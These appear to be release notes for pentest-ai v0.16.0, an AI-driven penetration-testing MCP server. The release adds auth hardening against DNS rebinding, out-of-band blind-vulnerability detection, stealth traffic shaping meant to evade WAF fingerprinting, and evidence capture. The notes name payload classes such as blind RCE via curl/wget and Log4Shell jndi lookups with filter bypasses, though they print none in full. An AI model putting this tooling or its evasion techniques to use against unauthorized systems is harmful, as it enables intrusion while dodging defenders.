
pentest-ai

v0.16.0 Security

This release includes 2 security fixes for security teams reviewing exposed deployments.

This release patches 2 known CVEs

Topics

ai-security bug-bounty claude ctf security exploit
exploit-chaining hacking-tools mcp model-context-protocol nmap offensive-security osint penetration-testing pentest-ai pentesting python vulnerability-scanning

Affected surfaces

auth

ReleasePort's take

Moderate signal

The release adds a per-install token file and a Host header allowlist to MCP server authentication, closing a CVE-2025-49596-style DNS-rebinding pivot. It also introduces several new features across the API surface, CLI behavior, and evidence handling.

Why it matters: the CVE-2025-49596-style DNS-rebinding pivot (severity 90) is closed by the per-install token file and Host header allowlist; operators who expose the MCP server over SSE/HTTP should apply this release immediately.

Summary

AI summary

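Adds MCP auth hardening and a REST adapter as the foundation for the pentest-ai-extensions plugins, out-of-band (Interactsh/OAST) detection of blind vulnerabilities, a real intensity=stealth implementation, and per-finding evidence bundles, plus two bug fixes.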

Changes in this release

Security Critical

Adds per-install token file and host allowlist for MCP auth (closes CVE-2025-49596 DNS-rebinding pivot).

Source: llm_adapter@2026-05-26

Confidence: high

Feature High

Adds REST adapter at `/v1/*` with health, findings, HTTP request, and evidence endpoints.

Source: llm_adapter@2026-05-26

Confidence: high

Feature High

Adds `get_findings` filters `url=` and `since=` for incremental querying.

Source: llm_adapter@2026-05-26

Confidence: high

Feature High

Adds `health()` MCP tool returning liveness probe data.

Source: llm_adapter@2026-05-26

Confidence: high

Feature High

Adds CLI agent‑mode parity for evidence collection and proxy passthrough.

Source: llm_adapter@2026-05-26

Confidence: high

Feature High

Adds out‑of‑band (Interactsh/OAST) integration for blind vulnerability detection.

Source: llm_adapter@2026-05-26

Confidence: high

Feature High

Implements real `intensity=stealth` traffic shaping: UA rotation, jitter, and upstream proxy passthrough.

Source: llm_adapter@2026-05-26

Confidence: high

Feature High

Adds per‑finding `evidence_artifacts` column and automatic HTTP exchange capture for reproducible proof.

Source: llm_adapter@2026-05-26

Confidence: high

Bugfix Medium

Fixes filename collision in `EvidenceCollector` by adding UUID entropy to timestamps.

Source: llm_adapter@2026-05-26

Confidence: high

Bugfix Medium

Fixes Ollama provider to honor `OLLAMA_HOST` environment variable.

Source: llm_adapter@2026-05-26

Confidence: high

Full changelog

Headline release closing 3 of 4 deal-breakers from the pentester-perspective audit shipped on 2026-05-24. Every finding now carries cryptographically-hashed proof, blind-vulnerability classes are detectable via OOB callbacks, and intensity=stealth actually changes traffic shape. Plus the foundations for the Caido / Burp / ZAP plugins coming in subsequent releases.

39 commits since 0.15.3. Smoke verified against the TaskFlow honeypot: 8 findings persisted, 8/8 carry evidence_artifacts, 406/406 on-disk artifacts produce valid curl reproducers, SARIF webRequest/webResponse populated, REST /v1/health + /v1/findings return 200, CLI agent-mode parity confirmed.

Added: plugin-client surfaces (REST adapter + auth hardening)

Foundation for the pentest-ai-extensions repo's Caido / Burp / ZAP plugins.

  • MCP auth: per-install token file + Host: allowlist (mcp_server/auth_local.py). ~/.pentest-ai/mcp-token (0600, fresh secrets.token_urlsafe(32) on first start) gates every SSE/HTTP request via Authorization: Bearer …. Host header allowlist (127.0.0.1 / localhost / ::1 plus the configured bind host) closes the CVE-2025-49596-style DNS-rebinding pivot from a same-host browser. Stdio transport stays auth-less (caller already has process access). ptai mcp --no-auth opts out on trusted hosts; --token-file <path> overrides the location.
  • REST adapter at /v1/* (mcp_server/rest.py). Four routes — GET /v1/health, GET /v1/findings, POST /v1/http_request, GET /v1/evidence — delegate to the existing @mcp.tool() functions via FastMCP's custom_route() decorator. Reuses LocalAuthMiddleware for identical Bearer-token + Host-header enforcement. Lets JVM/JS HTTP clients consume ptai over plain REST instead of SSE+JSON-RPC; foundation for the proxy plugins.
  • get_findings gains url= + since= filters (engine/findings_db.py, mcp_server/server.py). url= is a case-insensitive LIKE match against the target column so a proxy plugin can scope the Findings tab to the URL the user is currently inspecting. since=<iso-ts> lets the tab poll incrementally without re-downloading. Both default to None and combine cleanly with existing severity/status filters.
  • health() MCP tool (mcp_server/server.py). Liveness probe for plugin status indicators. Returns {status, version, timestamp, uptime_seconds, active_engagements} with zero side effects; never raises (degrades to active_engagements=0 when the DB is unreachable).
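The token-file and Host-allowlist checks described above can be sketched in a few lines of standard-library Python. This is only an illustration of the technique, not the code in mcp_server/auth_local.py: the function names load_or_create_token, host_only, and is_authorized are hypothetical, and the headers argument is assumed to be a plain dict with lower-cased keys.

```python
import hmac
import os
import secrets
from pathlib import Path

# Loopback names from the release note; the configured bind host is added per call.
LOOPBACK_HOSTS = {"127.0.0.1", "localhost", "::1"}


def load_or_create_token(path: Path) -> str:
    """Return the token stored at `path`, creating it with 0600 permissions on first use."""
    if path.exists():
        return path.read_text().strip()
    path.parent.mkdir(parents=True, exist_ok=True)
    token = secrets.token_urlsafe(32)
    # O_EXCL refuses to overwrite a file created by a concurrent first start.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(token)
    return token


def host_only(host_header: str) -> str:
    """Strip an optional port from a Host header, handling bracketed IPv6."""
    host = host_header.strip().lower()
    if host.startswith("["):
        return host[1:host.find("]")] if "]" in host else host
    if host.count(":") == 1:
        return host.split(":", 1)[0]
    return host  # bare hostname, IPv4, or unbracketed IPv6


def is_authorized(headers: dict, token: str, bind_host: str = "127.0.0.1") -> bool:
    """Accept only allowlisted Host values that also carry the right Bearer token."""
    allowed = LOOPBACK_HOSTS | {bind_host.lower()}
    if host_only(headers.get("host", "")) not in allowed:
        return False  # a rebinding page sends the attacker's hostname here
    scheme, _, presented = headers.get("authorization", "").partition(" ")
    if scheme.lower() != "bearer":
        return False
    # Constant-time comparison avoids leaking the token through timing.
    return hmac.compare_digest(presented.strip().encode(), token.encode())
```

The Host check is what defeats DNS rebinding: the browser still sends the attacker-controlled hostname in the Host header even after the name has been rebound to 127.0.0.1, so the request is rejected before the token is examined.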

Added: CLI agent-mode parity for evidence + proxy passthrough

  • ptai start agent-mode path (engine/agents/handlers/registry_bridge.py) now populates session._ptai_extras with engagement_id + an EvidenceCollector (rooted at $PENTEST_EVIDENCE_DIR) + an optional proxy from PTAI_UPSTREAM_PROXY, then drains the pending-evidence buffer onto every emitted finding via _attach_pending_evidence_to_findings(session, findings). Closes the carry-forward from Phase 1: every CLI-driven probe now carries evidence_artifacts the same way MCP-driven probes do. Intensity-derived stealth knobs (UA rotation, jitter) on the CLI path deferred — WorkingMemory doesn't carry intensity today; small refactor follows when needed.
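The drain-and-attach step can be pictured as follows. This is a minimal sketch that assumes findings and artifact summaries are plain dicts and that the pending buffer is a list; the real _attach_pending_evidence_to_findings takes a session object, and its internals are not shown in these notes.

```python
from typing import Any


def attach_pending_evidence(pending: list[dict[str, Any]],
                            findings: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """Drain `pending` and attach its summaries to findings that lack their own evidence."""
    drained = list(pending)
    pending.clear()  # leftover entries must not leak into the next probe run
    for finding in findings:
        # Findings that already set evidence_artifacts keep what they chose.
        if not finding.get("evidence_artifacts"):
            finding["evidence_artifacts"] = list(drained)
    return findings
```

Clearing the buffer inside the same call keeps the attach step idempotent per probe: a second call with no new captures attaches nothing.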

Added: out-of-band collaborator (Interactsh / OAST) integration

Phase 4 of the pentester-first roadmap closes audit deal-breaker #2 — blind-vulnerability classes (blind SSRF, blind SQLi, blind XXE, blind stored XSS, SSTI, Log4Shell) are now detectable.

  • engine/oob/ package: async Interactsh client. Generates an RSA-2048 keypair per engagement, registers it via POST /register on the configured server, polls GET /poll, and decrypts each interaction (AES-CTR-256 payload, key wrapped with RSA-OAEP-SHA256, IV = first 16 bytes). Wire format verified against github.com/projectdiscovery/interactsh. Defaults to https://oast.fun; accepts any self-hosted server via --oast-server.
  • pending_oob table (engine/findings_db.py) — parks finding templates at probe-fire time; persists across MCP restarts so late-arriving callbacks don't lose their trail. Indexed by engagement, status, and payload subdomain for O(1) interaction → probe lookup.
  • Curated payload library (engine/oob/payloads.py) — per-vuln-class payload templates with {OAST} placeholders: blind SSRF (HTTP/gopher/dict/ldap), blind SQLi per DBMS (MySQL/Postgres/MSSQL/Oracle), blind XXE (two-stage DTD + SVG), blind RCE (curl/wget/nslookup/dig + Windows variants + base64-wrapped WAF bypass), blind stored XSS (5 shapes), SSTI (Jinja2/Twig/Freemarker), Log4Shell (jndi:ldap/dns/rmi + ${lower:} bypass).
  • poll_oob MCP tool — the LLM driving ptai over MCP calls this after firing OOB-enabled probes. Polls the collaborator up to timeout=60 seconds (capped at 300, configurable), matches arriving interactions back to their pending rows via find_pending_oob_by_full_id, materializes the finding with the interaction record (timestamp, source IP, raw bytes) as an on-disk evidence artifact via the Phase-1 collector, flips the pending row to matched. Stale rows past their expires_at get bulk-moved to expired.
  • Probe wirings — SSRF (web.ssrf_cloud_metadata), blind SQLi (web.sqli_fuzz), XXE (web.xxe_upload), stored XSS (web.stored_xss) all fire OAST payloads when engagement_id is present in session extras. Bounded fan-out: one OOB-fire per discovered endpoint/path so request volume stays sane. Blind-RCE wiring deferred — no general command-injection probe exists today; the payloads ship for when one lands.
  • CLI flags: ptai start --oast-server URL / --oast-token T / --no-oast. These set PTAI_OAST_SERVER / PTAI_OAST_TOKEN / PTAI_NO_OAST=1 for the engagement.
  • Privacy disclosure in README under Responsible Use — encrypted-payload + server-side-metadata model, when to self-host (paid engagements / programs forbidding third-party collaborator infra), how to disable entirely.

End-to-end verified by a test (tests/test_oob_end_to_end.py) that stands up a mock Interactsh server on a loopback port, exercises register_oob_probe → mock-/register → pending_oob → mock-/poll-with-real-encryption → poll_oob → materialized finding with on-disk OOB evidence artifact carrying the interaction's source IP. 346 / 346 across the full Phase 1 + Phase 2 + Phase 4 regression sweep.
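The park-then-match flow behind {OAST} payloads can be sketched without any network or crypto. Everything below is illustrative: the two templates, render_payload, and the in-memory PendingOOB class are hypothetical stand-ins for engine/oob/payloads.py and the pending_oob table, and the random-label scheme is a simplification of Interactsh's real correlation IDs.

```python
import secrets
from typing import Optional

# Illustrative templates only; the shipped payload library is not reproduced here.
TEMPLATES = {
    "ssrf_http": "http://{OAST}/",
    "log4shell_ldap": "${jndi:ldap://{OAST}/a}",
}


def render_payload(template: str, base_domain: str) -> tuple[str, str]:
    """Return (payload, full_id) with a fresh random label under the collaborator domain."""
    full_id = f"{secrets.token_hex(8)}.{base_domain}".lower()
    # str.replace rather than str.format: Log4Shell-style templates contain literal braces.
    return template.replace("{OAST}", full_id), full_id


class PendingOOB:
    """In-memory stand-in for a pending-probe table keyed by the full interaction ID."""

    def __init__(self) -> None:
        self._rows: dict[str, dict] = {}

    def park(self, full_id: str, finding_template: dict) -> None:
        self._rows[full_id.lower()] = {"status": "pending", "finding": finding_template}

    def match(self, interaction: dict) -> Optional[dict]:
        """Turn a parked template into a finding the first time its callback arrives."""
        row = self._rows.get(interaction["full_id"].lower())
        if row is None or row["status"] != "pending":
            return None
        row["status"] = "matched"
        return {**row["finding"], "oob_interaction": interaction}
```

Keying the lookup on the full subdomain is what lets a callback that arrives minutes later be tied back to the exact probe that fired it.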

Added: real intensity=stealth implementation

The intensity=stealth knob had been advertised on the engagement schema since 0.15.0 but only changed rate-limit behavior. Now it actually changes traffic shape — closing the credibility-gap deal-breaker from the pentester audit.

  • Curated UA pool with per-call rotation (engine/probes/primitives.py). 7 modern UAs (Chrome / Firefox / Safari across Windows / Mac / Linux / Android / iOS) selected at random per HTTP call when stealth is on. WAF / scanner fingerprinters can't pin a single engine.
  • Per-request jitter (engine/probes/primitives.py). asyncio.sleep of random.uniform(min_ms, max_ms) / 1000 before every outbound call when stealth is on (default window 250–1500 ms). Concurrent probe waves stop bursting the target.
  • Upstream proxy passthrough (engine/probes/primitives.py + mcp_server/probes.py). Every HTTP call honors extras["proxy"], populated from the PTAI_UPSTREAM_PROXY env var or the new --upstream-proxy CLI flag. Lets pentesters route ptai through Burp / Caido for live inspection at any intensity — ptai start http://target --upstream-proxy http://127.0.0.1:8080.
  • Stealth knobs wired into MCP run_probe (mcp_server/probes.py). When the engagement intensity is stealth, run_probe populates session extras with ua_rotation=True, jitter_ms=(250, 1500). http_request always honors PTAI_UPSTREAM_PROXY.
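As a rough sketch of how the ua_rotation and jitter_ms extras might be consumed before each outbound call: the helper name stealth_prepare, the injectable sleep parameter, and the placeholder user-agent strings are all assumptions for illustration, since the notes do not list the curated pool or show the primitives code.

```python
import asyncio
import random

# Placeholder strings; the shipped pool has 7 curated UAs that the notes do not list.
UA_POOL = [
    "ExampleBrowser/1.0 (Windows)",
    "ExampleBrowser/1.0 (Macintosh)",
    "ExampleBrowser/1.0 (Linux)",
]


async def stealth_prepare(extras: dict, headers: dict, sleep=asyncio.sleep) -> dict:
    """Apply jitter and UA rotation for one outbound call, driven by session extras."""
    out = dict(headers)  # never mutate the caller's headers
    jitter = extras.get("jitter_ms")
    if jitter:
        min_ms, max_ms = jitter
        # Same arithmetic as the note: a uniform draw in milliseconds, slept in seconds.
        await sleep(random.uniform(min_ms, max_ms) / 1000)
    if extras.get("ua_rotation"):
        out["User-Agent"] = random.choice(UA_POOL)
    return out
```

Because the delay is drawn per call rather than per probe, concurrent probe waves desynchronize on their own instead of hitting the target in lockstep.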

Active on the MCP path today. CLI agent-mode + legacy orchestrator wiring still tracked separately.

Added: per-finding evidence bundle

The headline change. Every finding now ships with cryptographically-hashed proof of the HTTP exchange that produced it — closing the "AI slop" reproducibility deal-breaker that's caused multiple bug-bounty programs to deprioritize LLM-driven reports through 2025-2026.

  • evidence_artifacts column on findings table (engine/findings_db.py). JSON list of {artifact_id, type, sha256, filename, method, url, status_code} summaries pointing at the on-disk exchanges. Migration via the existing _add_column_if_missing() pattern with a '[]' default so old rows read as an empty list.
  • HTTP capture in the primitives chokepoint (engine/probes/primitives.py). Every http_get / http_post_json / http_post_form / http_put_json call through the primitives layer now persists its request + response to disk and appends a summary to a per-session pending buffer when an EvidenceCollector is attached via _ptai_extras. Existing probes get evidence for free with zero probe-side changes.
  • MCP run_probe collector wiring + orchestrator auto-attach (mcp_server/probes.py). Constructs an EvidenceCollector rooted at $PENTEST_EVIDENCE_DIR/<engagement_id>/, attaches it plus engagement_id to the probe's session, then after the probe returns its findings drains the pending buffer and auto-attaches the artifact summaries to every emitted finding that didn't set its own evidence_artifacts.
  • MCP http_request capture parity (mcp_server/probes.py). The LLM's raw-HTTP escape hatch now captures its exchange and returns the artifact summary in the response dict under evidence_artifacts.
  • SARIF v2.1.0 DAST webRequest / webResponse (engine/sarif.py). When a finding carries an http_request artifact, the SARIF result populates the DAST extension fields. GitHub Code Scanning's Security tab now renders the captured exchange inline with each finding.
  • request_to_curl() utility (engine/evidence.py). POSIX-shell-safe curl one-liner builder; used by the report renderer and by get_evidence(as_curl=True).
  • Enhanced MCP get_evidence (mcp_server/server.py). Adds include_content (returns raw bytes), as_curl (parses http_request artifacts and emits a copy-pasteable curl), and always returns the on-disk SHA-256 so callers can detect tampering by comparing against the hash stored in the finding's evidence_artifacts field.
  • Per-finding "Evidence bundle" section in HTML / PDF reports (agents/report/templates/report.html.j2, agents/report/renderer.py). Collapsible <details> block per finding listing each captured exchange's method/URL/status, SHA-256, and on-disk filename. The renderer tolerates both already-parsed lists and JSON-encoded strings from DB rows.
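The tamper check that the stored SHA-256 enables can be done offline against the evidence directory. The sketch below assumes each summary dict carries the filename and sha256 keys listed above and that artifacts sit directly under one directory; verify_artifacts is a hypothetical helper, not part of ptai.

```python
import hashlib
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large captured responses do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_artifacts(evidence_dir: Path, summaries: list[dict]) -> list[str]:
    """Return filenames whose on-disk content is missing or no longer matches the stored hash."""
    bad = []
    for summary in summaries:
        path = evidence_dir / summary["filename"]
        if not path.is_file() or sha256_file(path) != summary["sha256"]:
            bad.append(summary["filename"])
    return bad
```

An empty return value means every exchange referenced by the finding is still byte-identical to what was captured at probe time.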

Smoke verified against the local TaskFlow honeypot (port 4000): web.api_path_discovery emitted 8 findings, 8/8 carried evidence_artifacts, 405/405 on-disk artifacts produced valid curl repros via get_evidence(as_curl=True). End-to-end integration test in tests/test_evidence_integration_e2e.py walks the same loop against a synthetic loopback target on every CI run.
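A shell-safe curl reproducer of the kind mentioned above can be built by quoting every argument individually. This is a sketch of the general approach using shlex.quote, not the actual request_to_curl() in engine/evidence.py; the function name and its parameters are assumptions.

```python
import shlex
from typing import Optional


def request_to_curl_sketch(method: str, url: str,
                           headers: Optional[dict] = None,
                           body: Optional[str] = None) -> str:
    """Build a copy-pasteable curl command; every argument passes through shlex.quote."""
    parts = ["curl", "-X", method.upper()]
    for name, value in (headers or {}).items():
        parts += ["-H", f"{name}: {value}"]
    if body is not None:
        parts += ["--data-raw", body]  # --data-raw sends the body without @file expansion
    parts.append(url)
    return " ".join(shlex.quote(p) for p in parts)
```

Quoting each argument separately means that payloads containing quotes, ampersands, or dollar signs survive a paste into a POSIX shell unchanged, which matters when the captured request is itself an injection attempt.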

Wiring still TODO for the standalone CLI agent-mode + legacy orchestrator paths (cli/main.py); the MCP path — the recommended way to drive ptai per docs/ARCHITECTURE.md — is fully wired.

Fixed

  • Filename collision in EvidenceCollector (engine/evidence.py). _safe_timestamp() had second-granularity, so concurrent probe HTTP calls within the same second collided on filename and overwrote each other's captured exchanges. Now includes 8 hex chars of uuid4 entropy in the suffix. Surfaced by the new end-to-end test under web.api_path_discovery (~100 requests in <1 s).
  • Ollama provider now honors OLLAMA_HOST (engine/llm/factory.py). The factory previously read only OLLAMA_BASE_URL, so users following the official Ollama docs (which use OLLAMA_HOST as the canonical env var) had their setting silently ignored: the provider fell back to http://localhost:11434, and the agent loop hung on the 300 s HTTP timeout before exiting. The factory now reads OLLAMA_HOST first, then OLLAMA_BASE_URL as a back-compat alias. Closes #12.
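Both fixes come down to a few lines each. The sketch below is an assumption-laden illustration rather than the patched code: unique_artifact_stem and resolve_ollama_url are hypothetical names, the timestamp format is a guess, and no normalization of scheme-less OLLAMA_HOST values is attempted.

```python
import os
import uuid
from datetime import datetime, timezone
from typing import Optional


def unique_artifact_stem(now: Optional[datetime] = None) -> str:
    """Second-granularity timestamp plus 8 hex chars of uuid4 entropy."""
    ts = (now or datetime.now(timezone.utc)).strftime("%Y%m%dT%H%M%SZ")
    # The random suffix keeps names distinct when many captures land in the same second.
    return f"{ts}-{uuid.uuid4().hex[:8]}"


def resolve_ollama_url(env=os.environ) -> str:
    """Prefer OLLAMA_HOST, then the OLLAMA_BASE_URL alias, then the local default."""
    return env.get("OLLAMA_HOST") or env.get("OLLAMA_BASE_URL") or "http://localhost:11434"
```

Eight hex characters give 32 bits of entropy per second-bucket, which is ample for roughly 100 requests per second; a much higher request rate would argue for a longer suffix.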

Security Fixes

  • MCP auth token file + Host header allowlist closes CVE‑2025‑49596‑style DNS rebinding pivot
  • CVE-2025-49596


About pentest-ai

Offensive-security MCP server with 205 wrapped tools, 17 specialist agents, and 60 SPA-aware probes for OWASP Top 10. CLI + MCP, BYO LLM. No API key needed on MCP path.
